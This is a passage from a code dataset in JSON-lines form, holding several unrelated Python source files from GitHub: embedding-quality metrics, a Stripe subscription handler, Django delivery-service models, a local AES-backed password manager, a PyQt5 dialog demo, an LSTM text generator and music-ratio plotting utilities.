(5) in Klimovskaia et al.\n \"\"\"\n coRank = get_coRanking(Rank_high, Rank_low)\n N = len(coRank)+1\n\n df_score = pd.DataFrame(columns=['Qnx', 'Bnx'])\n Qnx = 0\n Bnx = 0\n for K in range(1, N):\n Qnx += sum(coRank[:K, K-1]) + sum(coRank[K-1, :K]) - coRank[K-1, K-1]\n Bnx += sum(coRank[:K, K-1]) - sum(coRank[K-1, :K])\n df_score.loc[len(df_score)] = [Qnx /(K*N), Bnx/(K*N)]\n\n if not (fname is None):\n df_score.to_csv(fname, sep = ',', index=False)\n \n return df_score\n\n\ndef get_scalars(Qnx):\n \"\"\"\n Computes scalar scores from Supplementary eq. (6)-(8) in Klimovskaia et al.\n \"\"\"\n N = len(Qnx) # total length of Qnx is smaller than number of samples\n K_max = 0\n val_max = Qnx[0] - 1/N\n for k in range(1, N):\n if val_max < (Qnx[k] - (k+1)/N):\n val_max = Qnx[k] - (k+1)/N\n K_max = k\n\n Qlocal = np.mean(Qnx[:K_max+1])\n Qglobal = np.mean(Qnx[K_max:])\n\n return Qlocal, Qglobal, K_max\n\n\ndef get_quality_metrics( \n coord_high, \n coord_low,\n distance='euclidean', \n setting='manifold',\n fname=None,\n k_neighbours=20,\n verbose=False):\n \"\"\"\n Implementation of 'Scale-independent quality criteria' from Lee et al. \n Parameters\n ----------\n coord_high : np.array\n Feature matrix of the sample in the high dimensional space.\n coord_low : np.array\n Low dimensional embedding of the sample.\n distance : str (default: 'euclidean')\n Distance metric to compute distanced between points in low dimendional \n space. Possible parameters: 'euclidean' or 'poincare'.\n setting: str (default: 'manifold')\n Setting to compute distances in the high dimensional space: 'global'\n distances or distances on the 'manifold' using a k=20 KNN graph.\n fname: str, optional (default: None)\n Name of the file where to save all the information about the metrics.\n verbose: bool (default: False)\n A flag if to print the results of the computations. 
\n k_neighbours: int (default: 20)\n k-nearest neighbours for setting\n Returns\n -------\n Qlocal: float\n Quality criteria for local qualities of the embedding.\n Range from 0 (bad) to 1 (good).\n Qglobal: float\n Quality criteria for global qualities of the embedding.\n Range from 0 (bad) to 1 (good).\n Kmax: int\n Kmax defines the split of the QNX curv.\n \"\"\"\n\n if setting == 'global':\n D_high = pairwise_distances(coord_high) \n elif setting == 'manifold':\n D_high = get_dist_manifold(\n coord_high, k_neighbours=k_neighbours, knn_sym=True)\n else:\n raise NotImplementedError\n\n Rank_high = get_ranking(D_high)\n\n if distance == 'euclidean': \n D_low = pairwise_distances(coord_low)\n elif distance == 'poincare':\n model = PoincareMaps(coord_low)\n model.get_distances()\n D_low = model.distances \n else:\n raise NotImplementedError\n\n Rank_low = get_ranking(D_low)\n df_score = get_score(Rank_high, Rank_low, fname=fname)\n\n Qlocal, Qglobal, Kmax = get_scalars(df_score['Qnx'].values)\n if verbose:\n print(f\"Qlocal = {Qlocal:.2f}, Qglobal = {Qglobal:.2f}, Kmax = {Kmax}\")\n\n return Qlocal, Qglobal, Kmax\n","repo_name":"facebookresearch/PoincareMaps","sub_path":"embedding_quality_score.py","file_name":"embedding_quality_score.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"45"} +{"seq_id":"28868322636","text":"import stripe\nfrom yoga.settings import SITE_NAME\nfrom django.conf import settings\nfrom .stripe_users import StripeCustomer\nimport pendulum\n\nfrom userTransactions.models import UserTransactionItem\nfrom siteTally.models import siteTransaction\nfrom subscription.models import subscription_product, subscription\n\nclass StripeLocalTransactions:\n def __init__(self):\n return self\n \n def create_transaction_webhook_subscription_cycle(self, invoice):\n sub_id = invoice['subscription']\n \n st_sub = stripe.Subscription.retrieve(sub_id)\n local_sub = subscription.objects.filter(creator = st_sub['metadata']['creator'], subsciber = st_sub['metadata']['subscriber']).select_related(\n 'creator', 'subscriber')[0] \n \n self.creator = local_sub.creator\n self.subscriber = local_sub.subscriber \n self.localSubscriptionObj = local_sub \n \n CustomerId = StripeCustomer(self.subscriber).findCreateCustomerId()\n \n try:\n price = int(invoice['amount'])\n UserTransactionItem.objects.create(\n user = self.subscriber,\n units = price,\n is_payment = False,\n is_purchase = True,\n is_refund = False,\n subscription = self.localSubscriptionObj\n )\n \n #create record for creator\n UserTransactionItem.objects.create(\n user = self.creator,\n units = price,\n is_payment = True,\n is_purchase = False,\n is_refund = False,\n subscription = self.localSubscriptionObj\n )\n except:\n return False\n \n try:\n siteTransaction.objects.create(\n st_transaction_id = invoice['id'],\n customerId = CustomerId.stripeCustomer,\n units = price,\n is_payment = True,\n is_refund = False,\n subscription = self.localSubscriptionObj\n )\n return True\n except:\n return False ","repo_name":"scarlettiron/Lotus-Exercise-Live-Stream-And-Subscription","sub_path":"backend/checkout/stripe_local_transactions.py","file_name":"stripe_local_transactions.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29393569348","text":"import pickle as pkl\n\n\ndef init_graph(path):\n \"\"\"\n return a dict of vertices and edges\n :param 
path: the path of graph file\n :return: a dict of vertices and edges with keys NodeList and EdgeList\n \"\"\"\n with open(path, 'r', encoding='utf-8') as f:\n fstr = f.read()\n\n index = fstr.find('*Edge')\n ver_keys = ['Node Id', 'Node Name', 'Weight', 'Node Class', 'Other Info']\n vertices = fstr[:index - 1].split('\\n')[1:]\n edges = fstr[index:].split('\\n')[1:-1]\n edg_keys = ['Edge Id-1', 'Edge Id-2', 'Edge Weight']\n\n NodeList = []\n EdgeList = []\n for i in range(len(vertices)):\n value = vertices[i].split('\\t')\n node = dict(zip(ver_keys, value))\n NodeList.append(node)\n for i in range(len(edges)):\n value = edges[i].split('\\t')\n edge = dict(zip(edg_keys, value))\n EdgeList.append(edge)\n res = {'NodeList': NodeList, 'EdgeList': EdgeList}\n return res\n\n\ndef save_graph(filepath, graph):\n \"\"\"\n save the graph\n :param filepath: path of the saving file\n :param graph:\n :return: None\n \"\"\"\n with open(filepath, 'wb') as f:\n pkl.dump(graph, f)\n print('Graph Saved')\n\n\ndef load_graph(filepath):\n \"\"\"\n load graph from savings\n :param filepath:\n :return: graph\n \"\"\"\n with open(filepath, 'rb') as f:\n res = pkl.load(f)\n print('Graph Loaded')\n return res","repo_name":"desline4709/ModernProgramDesigning","sub_path":"week5/GraphStat/GraphBuilder/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"794234332","text":"from flask import Flask, request\nimport os\n\nimport ds_mailer.Sender as Sender\nimport ds_mailer.Sitescanner\nfrom ds_mailer.gamelist import GAMES\n\napp = Flask(__name__)\n\nkey = os.environ['script_key']\n\n\n@app.route('/', methods=[\"POST\"])\ndef run():\n if request.method == \"POST\" and request.form['key'] == key:\n scanner = ds_mailer.Sitescanner.Sitescanner()\n for game in GAMES:\n game.get_current_price(scanner.get_price(game.link))\n text = Sender.create_mail(GAMES)\n return text\n else:\n return \"bad request\\n\"\n","repo_name":"jperelygin/ds_mailer","sub_path":"ds_mailer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"70643328776","text":"# -*- coding:utf-8 -*-\n# Time : 2019/09/16 下午 9:01 \n# Author : 御承扬\n# e-mail:2923616405@qq.com\n# project: PyQt5\n# File : CAllDialogMainWin.py \n# @software: PyCharm\n\n\nfrom 信号与槽.DateDialog import DateDialog\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nimport sys\n\n\nclass MainWin(QWidget):\n def __init__(self, parent=None):\n super(MainWin, self).__init__(parent)\n self.resize(400, 90)\n self.setWindowIcon(QIcon(\"./images/Python2.ico\"))\n self.setWindowTitle(\"窗口传递数据\")\n self.lineEdit = QLineEdit(self)\n self.button1 = QPushButton(\"弹出对话框1\")\n self.button1.clicked.connect(self.onButton1Click)\n self.button2 = QPushButton('弹出对话框2')\n self.button2.clicked.connect(self.onButton2Click)\n gridLayout = QGridLayout()\n gridLayout.addWidget(self.lineEdit)\n gridLayout.addWidget(self.button1)\n gridLayout.addWidget(self.button2)\n self.setLayout(gridLayout)\n\n def onButton1Click(self):\n dialog = DateDialog(self)\n result = dialog.exec_()\n date = dialog.dateTime()\n self.lineEdit.setText(date.date().toString())\n print('\\n 日期对话框的返回值')\n print('date=%s' % str(date.date()))\n print('time=%s' % str(date.time()))\n print('result=%s' % result)\n dialog.destroy()\n\n def onButton2Click(self):\n date, 
time, result = DateDialog.getDateTime()\n self.lineEdit.setText(date.toString())\n print('\\n 日期对话框的返回值')\n print('date=%s' % str(date))\n print('time=%s' % str(date))\n print('result=%s' % result)\n if result == QDialog.Accepted:\n print('点击确认按钮')\n else:\n print('点击取消按钮')\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = MainWin()\n form.show()\n sys.exit(app.exec_())\n","repo_name":"pyc-ycy/PyQt5","sub_path":"信号与槽/CAllDialogMainWin.py","file_name":"CAllDialogMainWin.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73877063177","text":"from uuid import uuid4\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.conf import settings\nfrom django.utils import timezone\n\nfrom phonenumber_field.modelfields import PhoneNumberField\n\n\nclass DeliveryUser(AbstractUser):\n id = models.UUIDField(verbose_name=\"Идентификатор\", default=uuid4, primary_key=True)\n patronymic = models.CharField(\"Отчетство\", max_length=150, blank=True, default=\"\")\n\n def __str__(self):\n patronymic_first_letter = self.patronymic[0:1] if len(self.patronymic) else \"\"\n first_name_first_letter = self.first_name[0:1] if len(self.first_name) else \"\"\n full_name = \"\"\n if self.first_name and self.last_name:\n full_name += self.last_name\n full_name += f\" {first_name_first_letter}.\"\n if patronymic_first_letter:\n full_name += f\"{patronymic_first_letter}.\"\n full_name += f\" ({self.username})\"\n return full_name\n\n class Meta:\n verbose_name = \"Пользователь\"\n verbose_name_plural = \"Пользователи\"\n ordering = [\"-id\"]\n\n\nclass Client(models.Model):\n id = models.UUIDField(verbose_name=\"Идентификатор\", default=uuid4, primary_key=True)\n first_name = models.CharField(\"Имя\", max_length=150, blank=True)\n patronymic = models.CharField(\"Отчетство\", max_length=150, blank=True, default=\"\")\n last_name = models.CharField(\"Фамилия\", max_length=150, blank=True)\n email = models.EmailField(\"Почта\", blank=True)\n phone_number = PhoneNumberField(\n unique=True, region=settings.PHONE_NUMBER_REGION, max_length=12\n )\n\n def __str__(self):\n patronymic_first_letter = self.patronymic[0:1] if len(self.patronymic) else \"\"\n first_name_first_letter = self.first_name[0:1] if len(self.first_name) else \"\"\n full_name = \"\"\n if self.first_name and self.last_name:\n full_name += self.last_name\n full_name += f\" {first_name_first_letter}.\"\n if patronymic_first_letter:\n full_name += f\"{patronymic_first_letter}.\"\n full_name += f\" ({self.phone_number})\"\n return full_name\n\n class Meta:\n verbose_name = \"Клиент\"\n verbose_name_plural = \"Клиенты\"\n ordering = [\"-id\"]\n\n\nclass TokenData(models.Model):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n verbose_name=\"Пользователь\",\n on_delete=models.CASCADE,\n unique=True,\n related_name=\"token_data\",\n )\n token = models.CharField(verbose_name=\"Токен\", max_length=1500)\n\n\nclass Deliveryman(models.Model):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n verbose_name=\"Пользователь\",\n on_delete=models.CASCADE,\n unique=True,\n related_name=\"deliveryman\",\n )\n is_team_lead = models.BooleanField(\n verbose_name=\"Является старшим доставщиком\", default=False\n )\n\n def __str__(self):\n return f\"{self.user}\"\n\n class Meta:\n verbose_name = \"Курьер\"\n verbose_name_plural = \"Курьеры\"\n ordering = [\"-id\"]\n\n\nclass 
City(models.Model):\n id = models.UUIDField(verbose_name=\"Идентификатор\", default=uuid4, primary_key=True)\n name = models.CharField(verbose_name=\"Название города\", max_length=255)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = \"Город\"\n verbose_name_plural = \"Города\"\n ordering = [\"-id\"]\n\n\nclass Address(models.Model):\n id = models.UUIDField(verbose_name=\"Идентификатор\", default=uuid4, primary_key=True)\n city = models.ForeignKey(City, verbose_name=\"Город\", on_delete=models.CASCADE)\n street = models.CharField(verbose_name=\"Улица\", max_length=255)\n building = models.CharField(verbose_name=\"Номер дома\", max_length=16)\n apartment = models.IntegerField(verbose_name=\"Номер квартиры\")\n\n def __str__(self):\n return (\n f\"{self.city} ул. {self.street} дом. {self.building} кв. {self.apartment}\"\n )\n\n class Meta:\n verbose_name = \"Адресс\"\n verbose_name_plural = \"Адрессы\"\n ordering = [\"-id\"]\n\n\nclass Order(models.Model):\n class GadgetType(models.TextChoices):\n TELEPHONE = (\"TELEPHONE\", \"телефон\")\n LAPTOP = (\"LAPTOP\", \"ноутбук\")\n TABLET = (\"TABLET\", \"планшет\")\n\n class RepairLvl(models.IntegerChoices):\n UNDEFINED = (0, \"Неопределен\")\n ONE = (1, \"Внешний осмотр, диагностика\")\n TWO = (2, \"Ремонт с разбором телефона, замена не паяных деталей\")\n THREE = (3, \"Замена дисплея, тачскрина\")\n FOUR = (4, \"Электро-механический ремонт\")\n\n class StatusEnum(models.TextChoices):\n CREATED = (\"CREATED\", \"Заявка создана\")\n GETTING_FROM_CLIENT = (\"GETTING_FROM_CLIENT\", \"Получение техники от клиента\")\n SENT_TO_REPAIR = (\"SENT_TO_REPAIR\", \"Доставлен в службу ремонта\")\n REPAIR_IN_PROCESS = (\"REPAIR_IN_PROCESS\", \"Ремонт начат\")\n REPAIR_DONE = (\"REPAIR_DONE\", \"Ремонт закончен\")\n SENDING_TO_CLIENT = (\"SENDING_TO_CLIENT\", \"Доставка техники клиенту\")\n CLOSED = (\"CLOSED\", \"Заявка закрыта\")\n\n id = models.UUIDField(verbose_name=\"Идентификатор заказа\", primary_key=True)\n client = models.ForeignKey(Client, verbose_name=\"Клиент\", on_delete=models.CASCADE)\n status = models.CharField(\n verbose_name=\"Статус заявки\",\n max_length=48,\n choices=StatusEnum.choices,\n )\n category = models.CharField(\n \"Техника\",\n max_length=15,\n choices=GadgetType.choices,\n default=GadgetType.TELEPHONE,\n )\n model = models.CharField(\n verbose_name=\"Модель техники\", max_length=1000, default=\"\", blank=True\n )\n address = models.ForeignKey(\n Address,\n verbose_name=\"Адресс клиента\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n serviceman_description = models.CharField(\n verbose_name=\"Комментарий ремонтника\", max_length=1000, default=\"\", blank=True\n )\n customer_description = models.CharField(\n verbose_name=\"Неисправность со слов клиента\",\n max_length=1000,\n default=\"\",\n blank=True,\n )\n deliveryman_description = models.CharField(\n verbose_name=\"Комментарий доставки\", max_length=1000, default=\"\", blank=True\n )\n deliveryman = models.ForeignKey(\n Deliveryman,\n verbose_name=\"Курьер\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n created = models.DateTimeField(\n verbose_name=\"Дата и время создания заявки\", default=timezone.now\n )\n updated = models.DateTimeField(\n verbose_name=\"Дата и время редактирования заявки\", auto_now=True\n )\n payment_completed = models.BooleanField(\n verbose_name=\"Оплала произведена?\", default=False\n )\n amount_due_by = models.FloatField(verbose_name=\"Сумма к оплате\", default=0)\n repair_lvl = 
models.IntegerField(\n verbose_name=\"Уровень ремонта\", choices=RepairLvl.choices, default=0\n )\n\n def __str__(self):\n return f\"Заявка id={self.id}\"\n\n class Meta:\n verbose_name = \"Заявка на доставку\"\n verbose_name_plural = \"Заявки на доставку\"\n ordering = [\"-created\"]\n","repo_name":"DemidovEvg/repair_cookies","sub_path":"delivery/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35184310825","text":"from os.path import expanduser\nhome = expanduser(\"~\")\n\ndirectorio = home + '/gestor_contrasenas'\n\nimport os\nos.chdir(directorio)\n\nimport numpy as np\nimport pandas as pd\nimport re\nimport random\nimport string\n\nfrom Crypto.Cipher import AES\nimport hashlib\n\n#generar_contrasena()\n\ndef generar_contrasena():\n \n caracteres_especiales = re.sub(r\"\\[|\\]|\\(|\\)|\\\\|/|\\{|\\}|<|>|\\||`|\\'|\\\"|\\^\", \n \"\", \n string.punctuation)\n\n caracteres = string.ascii_letters + string.digits + caracteres_especiales\n\n mayuscula = random.choice(string.ascii_uppercase)\n minuscula = random.choice(string.ascii_lowercase)\n numero = random.choice(string.digits)\n caracter_especial = random.choice(caracteres_especiales)\n\n otros = random.choices(caracteres, k = 6)\n \n lista_caracteres = [mayuscula, minuscula, numero, caracter_especial] + otros\n \n contrasena = \"\".join(np.random.choice(lista_caracteres, \n size = 10, \n replace = False))\n return(contrasena)\n\n#validar_contrasena()\n\ndef validar_contrasena(contrasena):\n\n caracteres_especiales = re.sub(r\"\\[|\\]|\\(|\\)|\\\\|/|\\{|\\}|<|>|\\||`|\\'|\\\"|\\^\", \n \"\", \n string.punctuation)\n tiene_mayuscula = re.search(r\"[A-Z]\", contrasena)\n tiene_minuscula = re.search(r\"[a-z]\", contrasena)\n tiene_numero = re.search(r\"[0-9]\", contrasena)\n tiene_caracter_especial = np.any([i in contrasena \\\n for i in caracteres_especiales])\n \n if(len(contrasena) >= 10 and \\\n tiene_mayuscula and \\\n tiene_minuscula and \\\n tiene_numero and \\\n tiene_caracter_especial):\n print(\"La contraseña es válida.\")\n else:\n print(\"La contraseña no es válida.\")\n\nimport base64\nimport hashlib\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\n\n#AESCipher()\n\nclass AESCipher(object):\n\n def __init__(self, key): \n self.bs = AES.block_size\n self.key = hashlib.sha256(key.encode()).digest()\n\n def encrypt(self, raw):\n raw = self._pad(raw)\n iv = Random.new().read(AES.block_size)\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return base64.b64encode(iv + cipher.encrypt(raw.encode()))\n\n def decrypt(self, enc):\n enc = base64.b64decode(enc)\n iv = enc[:AES.block_size]\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')\n\n def _pad(self, s):\n return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)\n\n @staticmethod\n def _unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n#leer_contrasenas()\n\ndef leer_contrasenas():\n\n contrasenas_cifradas = pd.read_csv(\"contrasenas.csv\")\n\n contrasenas = contrasenas_cifradas.copy()\n contrasenas['contrasena'] = [cipher.decrypt(i) \\\n for i in contrasenas_cifradas['contrasena']]\n return(contrasenas)\n\n#guardar_contrasenas()\n\ndef guardar_contrasenas(contrasenas):\n\n contrasenas_cifradas = contrasenas.copy()\n\n contrasenas_cifradas['contrasena'] = [str(cipher.encrypt(i), \"utf-8\") \\\n for i in contrasenas['contrasena']]\n\n 
contrasenas_cifradas.to_csv('contrasenas.csv', index = False)\n\n#salir()\n\ndef salir():\n exit()\n\n#crear_contrasena_maestra()\n\ndef crear_contrasena_maestra():\n\n raw_1 = input(\"Escribir contraseña: \")\n raw_2 = input(\"Escribir de nuevo la contraseña: \")\n\n if raw_1 == raw_2:\n\n archivo = open(\"contrasena_maestra\", \"wb\")\n archivo.write(hashlib.sha256(raw_1.encode()).digest());\n archivo.close()\n \n global contrasena_maestra\n contrasena_maestra = raw_1\n \n contrasenas = pd.DataFrame({\n 'login':[], \n 'contrasena':[]\n })\n \n contrasenas.to_csv(\"contrasenas.csv\", index = False)\n \n else:\n print(\"Las contraseñas no coinciden\")\n\n#verificar_contrasena_maestra()\n\ndef verificar_contrasena_maestra():\n\n raw = input(\"Ingresar contrasena maestra: \")\n \n archivo = open(\"contrasena_maestra\", \"rb\")\n contrasena = archivo.read()\n archivo.close()\n \n if hashlib.sha256(raw.encode()).digest() == contrasena:\n global contrasena_maestra\n contrasena_maestra = raw\n return(1)\n else:\n return(0)\n\n#agregar_cuenta()\n\ndef agregar_cuenta(*args):\n \n contrasenas = leer_contrasenas()\n \n for cuenta in args:\n if cuenta not in contrasenas['login'].values:\n \n contrasenas = contrasenas.append({'login':cuenta, \n 'contrasena':generar_contrasena()}, \n ignore_index = True)\n \n guardar_contrasenas(contrasenas)\n else:\n print(\"Fallo al agregar cuenta \" + cuenta + \": el nombre ya existe.\")\n\n#mostrar_cuenta()\n\ndef mostrar_cuenta(*args):\n\n if len(args) == 0:\n contrasenas = leer_contrasenas()\n print(contrasenas)\n else:\n contrasenas = leer_contrasenas()\n print(contrasenas[contrasenas['login'].isin(args)])\n\n#eliminar_cuenta()\n\ndef eliminar_cuenta(*args):\n \n contrasenas = leer_contrasenas()\n \n for cuenta in args:\n \n if cuenta in contrasenas['login'].values:\n \n contrasenas = contrasenas.query('login not in @cuenta')\n \n guardar_contrasenas(contrasenas)\n \n else:\n print(\"No se encontró la cuenta \" + cuenta + \".\")\n\n#cambiar_contrasena()\n\ndef cambiar_contrasena(*args):\n\n contrasenas = leer_contrasenas()\n if len(args) == 0:\n n = len(contrasenas['contrasena'])\n contrasenas['contrasena'] = np.array([generar_contrasena() for i in range(n)])\n \n guardar_contrasenas(contrasenas)\n else:\n n = len(contrasenas[contrasenas['login'].isin(args)])\n contrasenas['contrasena'][contrasenas['login'].isin(args)] = np.array([generar_contrasena() for i in range(n)])\n \n guardar_contrasenas(contrasenas)\n\n#cambiar_contrasena_maestra()\n\ndef cambiar_contrasena_maestra():\n\n raw = input(\"Ingresar contrasena maestra: \")\n \n archivo = open(\"contrasena_maestra\", \"rb\")\n contrasena = archivo.read()\n archivo.close()\n \n if hashlib.sha256(raw.encode()).digest() == contrasena:\n\n raw_1 = input(\"Escribir contraseña: \")\n raw_2 = input(\"Escribir de nuevo la contraseña: \")\n \n if raw_1 == raw_2:\n \n archivo = open(\"contrasena_maestra\", \"wb\")\n archivo.write(hashlib.sha256(raw_1.encode()).digest());\n archivo.close()\n \n global contrasena_maestra\n contrasena_maestra = raw_1\n global cipher\n cipher = AESCipher(contrasena_maestra)\n else:\n print(\"Las contraseñas no coinciden\")\n\n else:\n print(\"La contraseña es incorrecta.\")\n\n#ayuda()\n\ndef ayuda():\n\n print(\"Se pueden usar las siguientes funciones:\\n\\nsalir()\\nayuda()\\n\\nagregar_cuenta()\\nmostrar_cuenta()\\neliminar_cuenta()\\n\\ncambiar_contrasena()\\ncambiar_contrasena_maestra()\")\n\n#menu()\n\ndef menu():\n\n comando = None\n print(\"Escribir ayuda() para ver más opciones. 
Para salir, escribir salir().\")\n \n while comando != \"salir\":\n \n raw = input(\"$ \")\n try:\n comando_raw = re.search(r\"(^.*)(\\(.*)\", raw).group(1)\n except:\n comando_raw = \"\"\n \n if comando_raw in [\"salir\", \"ayuda\", \"agregar_cuenta\", \"mostrar_cuenta\", \n \"eliminar_cuenta\", \"cambiar_contrasena\", \n \"cambiar_contrasena_maestra\"]:\n comando = comando_raw\n eval(raw)\n \n else:\n print(\"Función inválida. Para más información escribir ayuda().\")\n\n#inicio()\n\ndef inicio():\n\n while(not os.path.exists('contrasena_maestra')):\n print(\"Para usar el gestor de contraseñas, se tiene que crear una contraseña maestra.\")\n crear_contrasena_maestra()\n \n autenticado = 0\n\n while autenticado == 0:\n autenticado = verificar_contrasena_maestra()\n if autenticado == 0:\n print(\"La contraseña es incorrecta.\")\n global cipher\n cipher = AESCipher(contrasena_maestra)\n menu()\n\ninicio()\n","repo_name":"gonzalezalfie/gestor_contrasenas","sub_path":"gestor_contrasenas.py","file_name":"gestor_contrasenas.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"39914008558","text":"from __future__ import print_function\nfrom OkapiV2.Core import Model, Branch\nfrom OkapiV2 import Activations\nfrom OkapiV2.Layers.Basic import FullyConnected, Dropout\nfrom OkapiV2.Layers.Activations import ActivationLayer\nfrom OkapiV2.Layers.Recurrent import LSTM\nimport numpy as np\nimport random\nimport sys\n\npath = 'data/lear.txt'\ntext = open(path).read().lower()\nprint('corpus length:', len(text))\n\nchars = set(text)\nprint('total chars:', len(chars))\nchar_indices = dict((c, i) for i, c in enumerate(chars))\nindices_char = dict((i, c) for i, c in enumerate(chars))\n\n# cut the text in semi-redundant sequences of maxlen characters\nmaxlen = 20\nstep = 3\nsentences = []\nnext_chars = []\nfor i in range(0, len(text) - maxlen, step):\n sentences.append(text[i: i + maxlen])\n next_chars.append(text[i + maxlen])\nprint('nb sequences:', len(sentences))\n\nprint('Vectorization...')\nX = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)\ny = np.zeros((len(sentences), len(chars)), dtype=np.bool)\nfor i, sentence in enumerate(sentences):\n for t, char in enumerate(sentence):\n X[i, t, char_indices[char]] = 1\n y[i, char_indices[next_chars[i]]] = 1\n\n\n# build the model: 2 stacked LSTM\nprint('Build model...')\ntree = Branch()\ntree.add_layer(LSTM((512, 1, 1, 1), return_sequences=True))\ntree.add_layer(Dropout(0.2))\ntree.add_layer(LSTM((512, 1, 1, 1), return_sequences=False))\ntree.add_layer(Dropout(0.2))\ntree.add_layer(FullyConnected())\ntree.add_layer(ActivationLayer(Activations.softmax))\ntree.add_input(X)\n\nmodel = Model()\nmodel.set_tree(tree)\n\ndef sample(a, temperature=1.0):\n # helper function to sample an index from a probability array\n a = np.log(a) / temperature\n a = np.exp(a) / np.sum(np.exp(a))\n return np.argmax(np.random.multinomial(1, a, 1))\n\n# train the model, output generated text after each iteration\nfor iteration in range(1, 60):\n print()\n print('-' * 50)\n print('Iteration', iteration)\n model.train([X], y, num_epochs=1)\n\n start_index = random.randint(0, len(text) - maxlen - 1)\n\n for diversity in [0.2, 0.5, 1.0, 1.2]:\n print()\n print('----- diversity:', diversity)\n\n generated = ''\n sentence = text[start_index: start_index + maxlen]\n generated += sentence\n print('----- Generating with seed: \"' + sentence + '\"')\n sys.stdout.write(generated)\n\n 
for iteration in range(400):\n x = np.zeros((1, maxlen, len(chars)))\n for t, char in enumerate(sentence):\n x[0, t, char_indices[char]] = 1.\n\n preds = model.predict([x])[0]\n next_index = sample(preds, diversity)\n next_char = indices_char[next_index]\n\n generated += next_char\n sentence = sentence[1:] + next_char\n\n sys.stdout.write(next_char)\n sys.stdout.flush()\n print()\n model.save_params('shakespeare_params_vec.pk')\n","repo_name":"agajews/Neural-Network-Dev","sub_path":"okapi_shakespeare_2.py","file_name":"okapi_shakespeare_2.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"25852894357","text":"import itertools, json, math\nfrom fractions import Fraction\nimport numpy as np\nimport math\nimport numpy_indexed as npi\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits import mplot3d\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.legend_handler import HandlerPatch\nimport matplotlib.patches as mpatches\nimport matplotlib.colors\nimport networkx as nx\nfrom networkx.drawing.nx_agraph import graphviz_layout\nfrom scipy.spatial.distance import cdist\n\n\ndef make_legend_arrow(legend, orig_handle,\n xdescent, ydescent,\n width, height, fontsize):\n p = mpatches.FancyArrow(0, 0.5*height, width, 0, length_includes_head=True, head_width=0.75*height )\n return p\n\nclass Arrow3D(FancyArrowPatch):\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))\n FancyArrowPatch.draw(self, renderer)\n\ndef cents_to_hz(cents, root):\n return root * (2 ** (1/12)) ** (cents/100)\n\ndef hz_to_cents(hz, root):\n return 1200 * math.log2(hz / root)\n\ndef get_segments(pts):\n combs = list(itertools.combinations(range(len(pts)), 2))\n segments = np.array([(pts[i[0]], pts[i[1]]) for i in combs])\n if len(segments) > 0:\n is_neighbor = np.sum(np.abs(segments[:, 0] - segments[:, 1]), axis=1) == 1\n segments = segments[is_neighbor]\n segments = np.transpose(segments, axes=(0, 2, 1))\n return segments\n\ndef get_ratios(pts, primes, octaves = None, oct_generalized = False, string=True):\n if np.all(octaves == None):\n octaves = np.repeat(0, len(primes))\n prods = np.product((primes * (2.0**octaves)) ** pts, axis=1)\n fracs = [Fraction(i).limit_denominator(1000) for i in prods]\n if oct_generalized == True:\n for f in range(len(fracs)):\n while fracs[f] >= 2:\n fracs[f] /= 2\n while fracs[f] < 1:\n fracs[f] *= 2\n str_fracs = [str(i.numerator) + ':' + str(i.denominator) for i in fracs]\n if string == True:\n return str_fracs\n else:\n return fracs\n\n\n# TODO remove plotting from utils and change import refs to import from plot.py\ndef make_plot(pts, primes, path, octaves = None, draw_points = None,\n oct_generalized = False, dot_size=1, colors=None, ratios=True,\n origin=False, origin_range = [-2, 3], get_ax=False, legend=True,\n range_override=[0, 0], transparent=False, connect_color='grey',\n draw_point_visible=False, draw_color='seagreen', connect_size=1,\n file_type='pdf', opacity=0.5, root_layout=False, elev=16, azim=-72):\n\n\n c = matplotlib.colors.get_named_colors_mapping()\n if np.all(colors == None):\n colors = ['black' for i in range(len(pts))]\n else:\n colors = 
